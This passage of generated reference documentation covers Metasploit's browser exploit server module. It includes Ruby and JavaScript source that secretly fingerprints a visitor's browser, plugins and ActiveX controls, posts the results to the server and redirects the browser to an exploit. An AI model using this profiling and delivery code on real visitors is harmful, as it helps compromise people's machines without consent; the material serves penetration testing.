href="../../Auxiliary/Report.html#inside_workspace_boundary%3F-instance_method" title="Msf::Auxiliary::Report#inside_workspace_boundary? (method)">#inside_workspace_boundary?</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#invalidate_login-instance_method" title="Msf::Auxiliary::Report#invalidate_login (method)">#invalidate_login</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#mytask-instance_method" title="Msf::Auxiliary::Report#mytask (method)">#mytask</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#myworkspace-instance_method" title="Msf::Auxiliary::Report#myworkspace (method)">#myworkspace</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#myworkspace_id-instance_method" title="Msf::Auxiliary::Report#myworkspace_id (method)">#myworkspace_id</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_auth_info-instance_method" title="Msf::Auxiliary::Report#report_auth_info (method)">#report_auth_info</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_client-instance_method" title="Msf::Auxiliary::Report#report_client (method)">#report_client</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_exploit-instance_method" title="Msf::Auxiliary::Report#report_exploit (method)">#report_exploit</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_host-instance_method" title="Msf::Auxiliary::Report#report_host (method)">#report_host</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_loot-instance_method" title="Msf::Auxiliary::Report#report_loot (method)">#report_loot</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_note-instance_method" title="Msf::Auxiliary::Report#report_note (method)">#report_note</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_service-instance_method" title="Msf::Auxiliary::Report#report_service (method)">#report_service</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_vuln-instance_method" title="Msf::Auxiliary::Report#report_vuln (method)">#report_vuln</a></span>, <span class='object_link'><a href="../../Auxiliary/Report.html#report_web_form-instance_method" title="Msf::Auxiliary::Report#report_we
<h3 class="inherited">Methods included from <span class='object_link'><a href="../../../Metasploit/Framework/Require.html" title="Metasploit::Framework::Require (module)">Metasploit::Framework::Require</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally-class_method" title="Metasploit::Framework::Require.optionally (method)">optionally</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_active_record_railtie-class_method" title="Metasploit::Framework::Require.optionally_active_record_railtie (method)">optionally_active_record_railtie</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-class_method" title="Metasploit::Framework::Require.optionally_include_metasploit_credential_creation (method)">optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_include_metasploit_credential_creation-instance_method" title="Metasploit::Framework::Require#optionally_include_metasploit_credential_creation (method)">#optionally_include_metasploit_credential_creation</a></span>, <span class='object_link'><a href="../../../Metasploit/Framework/Require.html#optionally_require_metasploit_db_gem_engines-class_method" title="Metasploit::Framework::Require.optionally_require_metasploit_db_gem_engines (method)">optionally_require_metasploit_db_gem_engines</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="TcpServer.html" title="Msf::Exploit::Remote::TcpServer (module)">TcpServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="TcpServer.html#on_client_close-instance_method" title="Msf::Exploit::Remote::TcpServer#on_client_close (method)">#on_client_close</a></span>, <span class='object_link'><a href="TcpServer.html#on_client_connect-instance_method" title="Msf::Exploit::Remote::TcpServer#on_client_connect (method)">#on_client_connect</a></span>, <span class='object_link'><a href="TcpServer.html#ssl-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl (method)">#ssl</a></span>, <span class='object_link'><a href="TcpServer.html#ssl_cert-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl_cert (method)">#ssl_cert</a></span>, <span class='object_link'><a href="TcpServer.html#ssl_cipher-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl_cipher (method)">#ssl_cipher</a></span>, <span class='object_link'><a href="TcpServer.html#ssl_compression-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl_compression (method)">#ssl_compression</a></span>, <span class='object_link'><a href="TcpServer.html#ssl_version-instance_method" title="Msf::Exploit::Remote::TcpServer#ssl_version (method)">#ssl_version</a></span>, <span class='object_link'><a href="TcpServer.html#start_service-instance_method" title="Msf::Exploit::Remote::TcpServer#start_service (method)">#start_service</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="SocketServer.html" title="Msf::Exploit::Remote::SocketServer (module)">SocketServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="SocketServer.html#_determine_server_comm-instance_method" title="Msf::Exploit::Remote::SocketServer#_determine_server_comm (method)">#_determine_server_comm</a></span>, <span class='object_link'><a href="SocketServer.html#bindhost-instance_method" title="Msf::Exploit::Remote::SocketServer#bindhost (method)">#bindhost</a></span>, <span class='object_link'><a href="SocketServer.html#bindport-instance_method" title="Msf::Exploit::Remote::SocketServer#bindport (method)">#bindport</a></span>, <span class='object_link'><a href="SocketServer.html#cleanup_service-instance_method" title="Msf::Exploit::Remote::SocketServer#cleanup_service (method)">#cleanup_service</a></span>, <span class='object_link'><a href="SocketServer.html#exploit-instance_method" title="Msf::Exploit::Remote::SocketServer#exploit (method)">#exploit</a></span>, <span class='object_link'><a href="SocketServer.html#on_client_data-instance_method" title="Msf::Exploit::Remote::SocketServer#on_client_data (method)">#on_client_data</a></span>, <span class='object_link'><a href="SocketServer.html#primer-instance_method" title="Msf::Exploit::Remote::SocketServer#primer (method)">#primer</a></span>, <span class='object_link'><a href="SocketServer.html#regenerate_payload-instance_method" title="Msf::Exploit::Remote::SocketServer#regenerate_payload (method)">#regenerate_payload</a></span>, <span class='object_link'><a href="SocketServer.html#srvhost-instance_method" title="Msf::Exploit::Remote::SocketServer#srvhost (method)">#srvhost</a></span>, <span class='object_link'><a href="SocketServer.html#srvhost_addr-instance_method" title="Msf::Exploit::Remote::SocketServer#srvhost_addr (method)">#srvhost_addr</a></span>, <span class='object_link'><a href="SocketServer.html#srvport-instance_method" title="Msf::Exploit::Remote::SocketServer#srvport (method)">#srvport</a></span>, <span class='object_link'><a href="SocketServer.html#start_service-instance_method" title="Msf::Exploit::Remote::SocketServer#start_service (method)">#start_service</a></span>, <span class='object_link'><a href="SocketServer.html#via_string-instance_method" title="Msf::Exploit::Remote::SocketServer#via_string (method)">#via_string</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="browser_profile_prefix-instance_method">
#<strong>browser_profile_prefix</strong> &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns a prefix thats unique to this browser exploit module. This overrides the #browser_profile_prefix method from Msf::Exploit::Remote::BrowserProfileManager. There are two way for BES to get this prefix, either:</p>
<ul><li>
<p>It comes from a datastore option. It allows BrowserAutoPwn to share the unique prefix with its child exploits, so that these exploits dont have to gather browser information again.</p>
</li><li>
<p>If the datastore option isnt set, then we assume the user is firing the exploit as a standalone so we make something more unique, so that if there are two instances using the same exploit, they dont actually share info.</p>
</li></ul>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
128
129
130
131
132</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 128</span>
<span class='kw'>def</span> <span class='id identifier rubyid_browser_profile_prefix'>browser_profile_prefix</span>
<span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>BrowserProfilePrefix</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='ivar'>@unique_prefix</span> <span class='op'>||=</span> <span class='id identifier rubyid_lambda'>lambda</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_shortname'>shortname</span><span class='embexpr_end'>}</span><span class='tstring_content'>.</span><span class='embexpr_beg'>#{</span><span class='const'>Time</span><span class='period'>.</span><span class='id identifier rubyid_now'>now</span><span class='period'>.</span><span class='id identifier rubyid_to_i'>to_i</span><span class='embexpr_end'>}</span><span class='tstring_content'>.</span><span class='embexpr_beg'>#{</span><span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_uuid'>uuid</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='rbrace'>}</span><span class='period'>.</span><span class='id identifier rubyid_call'>call</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="cleanup-instance_method">
#<strong>cleanup</strong> &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Cleans up target information owned by the current module.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
136
137
138
139
140</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 136</span>
<span class='kw'>def</span> <span class='id identifier rubyid_cleanup'>cleanup</span>
<span class='kw'>super</span>
<span class='comment'># Whoever registered BrowserProfilePrefix should do the cleanup
</span> <span class='id identifier rubyid_clear_browser_profiles'>clear_browser_profiles</span> <span class='kw'>unless</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>BrowserProfilePrefix</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="cookie_header-instance_method">
#<strong>cookie_header</strong>(tag) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns HTTP header string for the tracking cookie.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>HTTP header string for the tracking cookie</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
519
520
521
522
523
524
525
526
527</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 519</span>
<span class='kw'>def</span> <span class='id identifier rubyid_cookie_header'>cookie_header</span><span class='lparen'>(</span><span class='id identifier rubyid_tag'>tag</span><span class='rparen'>)</span>
<span class='id identifier rubyid_cookie'>cookie</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cookie_name'>cookie_name</span><span class='embexpr_end'>}</span><span class='tstring_content'>=</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_tag'>tag</span><span class='embexpr_end'>}</span><span class='tstring_content'>;</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>if</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>CookieExpiration</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_present?'>present?</span>
<span class='id identifier rubyid_expires_date'>expires_date</span> <span class='op'>=</span> <span class='lparen'>(</span><span class='const'>DateTime</span><span class='period'>.</span><span class='id identifier rubyid_now'>now</span> <span class='op'>+</span> <span class='int'>365</span><span class='op'>*</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>CookieExpiration</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_i'>to_i</span><span class='rparen'>)</span>
<span class='id identifier rubyid_expires_str'>expires_str</span> <span class='op'>=</span> <span class='id identifier rubyid_expires_date'>expires_date</span><span class='period'>.</span><span class='id identifier rubyid_to_time'>to_time</span><span class='period'>.</span><span class='id identifier rubyid_strftime'>strftime</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>%a, %d %b %Y 12:00:00 GMT</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_cookie'>cookie</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'> Expires=</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_expires_str'>expires_str</span><span class='embexpr_end'>}</span><span class='tstring_content'>;</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_cookie'>cookie</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="cookie_name-instance_method">
#<strong>cookie_name</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns Name of the tracking cookie.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Name of the tracking cookie</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
514
515
516</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 514</span>
<span class='kw'>def</span> <span class='id identifier rubyid_cookie_name'>cookie_name</span>
<span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>CookieName</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='const'><span class='object_link'><a href="#DEFAULT_COOKIE_NAME-constant" title="Msf::Exploit::Remote::BrowserExploitServer::DEFAULT_COOKIE_NAME (constant)">DEFAULT_COOKIE_NAME</a></span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="extract_requirements-instance_method">
#<strong>extract_requirements</strong>(reqs) &#x21d2; <tt>Hash</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns a hash of recognizable requirements</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>reqs</span>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>A hash that contains data for the requirements</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>A hash of requirements</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
176
177
178
179
180</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 176</span>
<span class='kw'>def</span> <span class='id identifier rubyid_extract_requirements'>extract_requirements</span><span class='lparen'>(</span><span class='id identifier rubyid_reqs'>reqs</span><span class='rparen'>)</span>
<span class='id identifier rubyid_tmp'>tmp</span> <span class='op'>=</span> <span class='id identifier rubyid_reqs'>reqs</span><span class='period'>.</span><span class='id identifier rubyid_select'>select</span> <span class='lbrace'>{</span><span class='op'>|</span><span class='id identifier rubyid_k'>k</span><span class='comma'>,</span><span class='id identifier rubyid_v'>v</span><span class='op'>|</span> <span class='const'><span class='object_link'><a href="#REQUIREMENT_KEY_SET-constant" title="Msf::Exploit::Remote::BrowserExploitServer::REQUIREMENT_KEY_SET (constant)">REQUIREMENT_KEY_SET</a></span></span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='id identifier rubyid_k'>k</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rparen'>)</span><span class='rbrace'>}</span>
<span class='comment'># Make sure keys are always symbols
</span> <span class='const'>Hash</span><span class='lbracket'>[</span><span class='id identifier rubyid_tmp'>tmp</span><span class='period'>.</span><span class='id identifier rubyid_map'>map</span><span class='lbrace'>{</span><span class='op'>|</span><span class='lparen'>(</span><span class='id identifier rubyid_k'>k</span><span class='comma'>,</span><span class='id identifier rubyid_v'>v</span><span class='rparen'>)</span><span class='op'>|</span> <span class='lbracket'>[</span><span class='id identifier rubyid_k'>k</span><span class='period'>.</span><span class='id identifier rubyid_to_sym'>to_sym</span><span class='comma'>,</span><span class='id identifier rubyid_v'>v</span><span class='rbracket'>]</span><span class='rbrace'>}</span><span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="get_bad_requirements-instance_method">
#<strong>get_bad_requirements</strong>(profile) &#x21d2; <tt>Array</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns an array of items that do not meet the requirements</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>profile</span>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>The profile to check</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>An array of requirements not met</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 236</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_bad_requirements'>get_bad_requirements</span><span class='lparen'>(</span><span class='id identifier rubyid_profile'>profile</span><span class='rparen'>)</span>
<span class='id identifier rubyid_bad_reqs'>bad_reqs</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='rbracket'>]</span>
<span class='ivar'>@requirements</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_rk'>rk</span><span class='comma'>,</span> <span class='id identifier rubyid_v'>v</span><span class='op'>|</span>
<span class='id identifier rubyid_k'>k</span> <span class='op'>=</span> <span class='id identifier rubyid_rk'>rk</span><span class='period'>.</span><span class='id identifier rubyid_to_sym'>to_sym</span>
<span class='id identifier rubyid_expected'>expected</span> <span class='op'>=</span> <span class='id identifier rubyid_k'>k</span> <span class='op'>!=</span> <span class='symbol'>:vuln_test</span> <span class='op'>?</span> <span class='id identifier rubyid_v'>v</span> <span class='op'>:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>true</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Comparing requirement: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_k'>k</span><span class='embexpr_end'>}</span><span class='tstring_content'>=</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_expected'>expected</span><span class='embexpr_end'>}</span><span class='tstring_content'> vs </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_k'>k</span><span class='embexpr_end'>}</span><span class='tstring_content'>=</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_profile'>profile</span><span class='lbracket'>[</span><span class='id identifier rubyid_k'>k</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_k'>k</span> <span class='op'>==</span> <span class='symbol'>:activex</span>
<span class='id identifier rubyid_bad_reqs'>bad_reqs</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_k'>k</span> <span class='kw'>if</span> <span class='id identifier rubyid_has_bad_activex?'>has_bad_activex?</span><span class='lparen'>(</span><span class='id identifier rubyid_profile'>profile</span><span class='lbracket'>[</span><span class='id identifier rubyid_k'>k</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_k'>k</span> <span class='op'>==</span> <span class='symbol'>:vuln_test</span>
<span class='id identifier rubyid_bad_reqs'>bad_reqs</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_k'>k</span> <span class='kw'>unless</span> <span class='id identifier rubyid_profile'>profile</span><span class='lbracket'>[</span><span class='id identifier rubyid_k'>k</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>true</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_v'>v</span><span class='period'>.</span><span class='id identifier rubyid_is_a?'>is_a?</span> <span class='const'>Regexp</span>
<span class='id identifier rubyid_bad_reqs'>bad_reqs</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_k'>k</span> <span class='kw'>if</span> <span class='id identifier rubyid_profile'>profile</span><span class='lbracket'>[</span><span class='id identifier rubyid_k'>k</span><span class='rbracket'>]</span> <span class='op'>!~</span> <span class='id identifier rubyid_v'>v</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_v'>v</span><span class='period'>.</span><span class='id identifier rubyid_is_a?'>is_a?</span> <span class='const'>Proc</span>
<span class='id identifier rubyid_bad_reqs'>bad_reqs</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_k'>k</span> <span class='kw'>unless</span> <span class='id identifier rubyid_v'>v</span><span class='period'>.</span><span class='id identifier rubyid_call'>call</span><span class='lparen'>(</span><span class='id identifier rubyid_profile'>profile</span><span class='lbracket'>[</span><span class='id identifier rubyid_k'>k</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_bad_reqs'>bad_reqs</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_k'>k</span> <span class='kw'>if</span> <span class='id identifier rubyid_profile'>profile</span><span class='lbracket'>[</span><span class='id identifier rubyid_k'>k</span><span class='rbracket'>]</span> <span class='op'>!=</span> <span class='id identifier rubyid_v'>v</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_bad_reqs'>bad_reqs</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="get_custom_404_url-instance_method">
#<strong>get_custom_404_url</strong> &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the custom 404 URL set by the user</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
145
146
147</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 145</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_custom_404_url'>get_custom_404_url</span>
<span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Custom404</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="get_detection_html-instance_method">
#<strong>get_detection_html</strong>(user_agent) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the code for client-side detection</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>user_agent</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The user-agent of the browser</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Returns the HTML for detection</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_exploit_server.rb', line 358</span>
<span class='kw'>def</span> <span class='id identifier rubyid_get_detection_html'>get_detection_html</span><span class='lparen'>(</span><span class='id identifier rubyid_user_agent'>user_agent</span><span class='rparen'>)</span>
<span class='id identifier rubyid_ua_info'>ua_info</span> <span class='op'>=</span> <span class='id identifier rubyid_fingerprint_user_agent'>fingerprint_user_agent</span><span class='lparen'>(</span><span class='id identifier rubyid_user_agent'>user_agent</span><span class='rparen'>)</span>
<span class='id identifier rubyid_os'>os</span> <span class='op'>=</span> <span class='id identifier rubyid_ua_info'>ua_info</span><span class='lbracket'>[</span><span class='symbol'>:os_name</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_client'>client</span> <span class='op'>=</span> <span class='id identifier rubyid_ua_info'>ua_info</span><span class='lbracket'>[</span><span class='symbol'>:ua_name</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_code'>code</span> <span class='op'>=</span> <span class='const'>ERB</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
&lt;%= js_base64 %&gt;
&lt;%= js_os_detect %&gt;
&lt;%= js_ajax_post %&gt;
&lt;%= js_misc_addons_detect %&gt;
&lt;%= js_ie_addons_detect if os.match(OperatingSystems::Match::WINDOWS) and client == HttpClients::IE %&gt;
function objToQuery(obj) {
var q = [];
for (var key in obj) {
q.push(encodeURIComponent(key) + &#39;=&#39; + encodeURIComponent(obj[key]));
}
return Base64.encode(q.join(&#39;&amp;&#39;));
}
function isEmpty(str) {
return (!str \|\| 0 === str.length);
}
function sendInfo(info) {
var query = objToQuery(info);
postInfo(&quot;&lt;%=get_resource.chomp(&quot;/&quot;)%&gt;/&lt;%=@info_receiver_page%&gt;/&quot;, query, function(){
window.location=&quot;&lt;%= get_module_resource %&gt;&quot;;
});
}
var flashVersion = &quot;&quot;;
var doInterval = true;
var maxTimeout = null;
var intervalTimeout = null;
function setFlashVersion(ver) {
flashVersion = ver
if (maxTimeout != null) {
clearTimeout(maxTimeout);
maxTimeout = null
}
doInterval = false
return;
}
function createFlashObject(src, attributes, parameters) {
var i, html, div, obj, attr = attributes \|\| {}, param = parameters \|\| {};
attr.type = &#39;application/x-shockwave-flash&#39;;
if (window.ActiveXObject) {
attr.classid = &#39;clsid:d27cdb6e-ae6d-11cf-96b8-444553540000&#39;;
param.movie = src;
} else {
attr.data = src;
}
html = &#39;&lt;object&#39;;
for (i in attr) {
html += &#39; &#39; + i + &#39;=&quot;&#39; + attr[i] + &#39;&quot;&#39;;
}
html += &#39;&gt;&#39;;
for (i in param) {
html += &#39;&lt;param name=&quot;&#39; + i + &#39;&quot; value=&quot;&#39; + param[i] + &#39;&quot; /&gt;&#39;;
}
html += &#39;&lt;/object&gt;&#39;;
div = document.createElement(&#39;div&#39;);
div.innerHTML = html;
obj = div.firstChild;
div.removeChild(obj);
return obj;
}
window.onload = function() {
var osInfo = os_detect.getVersion();
var d = {
&quot;os_vendor&quot; : osInfo.os_vendor,
&quot;os_device&quot; : osInfo.os_device,
&quot;ua_name&quot; : osInfo.ua_name,
&quot;ua_ver&quot; : osInfo.ua_version,
&quot;arch&quot; : osInfo.arch,
&quot;java&quot; : misc_addons_detect.getJavaVersion(),
&quot;silverlight&quot; : misc_addons_detect.hasSilverlight(),
&quot;flash&quot; : misc_addons_detect.getFlashVersion(),
&quot;vuln_test&quot; : &lt;%= js_vuln_test %&gt;,
&quot;os_name&quot; : osInfo.os_name
};
&lt;% if os.match(OperatingSystems::Match::WINDOWS) and client == HttpClients::IE %&gt;
d[&#39;office&#39;] = ie_addons_detect.getMsOfficeVersion();
d[&#39;mshtml_build&#39;] = ScriptEngineBuildVersion().toString();
&lt;%
activex = @requirements[:activex]
if activex
activex.each do \|a\|
clsid = a[:clsid]
method = a[:method]
%&gt;
var ax = ie_addons_detect.hasActiveX(&#39;&lt;%=clsid%&gt;&#39;, &#39;&lt;%=method%&gt;&#39;);
d[&#39;activex&#39;] = &quot;&quot;;
if (ax == true) {
d[&#39;activex&#39;] += &quot;&lt;%=clsid%&gt;=&gt;&lt;%=method%&gt;=&gt;true;&quot;;
} else {
d[&#39;activex&#39;] += &quot;&lt;%=clsid%&gt;=&gt;&lt;%=method%&gt;=&gt;false;&quot;;
}
&lt;% end %&gt;
&lt;% end %&gt;
&lt;% end %&gt;
if (d[&quot;flash&quot;] != null &amp;&amp; (d[&quot;flash&quot;].match(/[\\d]+.[\\d]+.[\\d]+.[\\d]+/)) == null) {
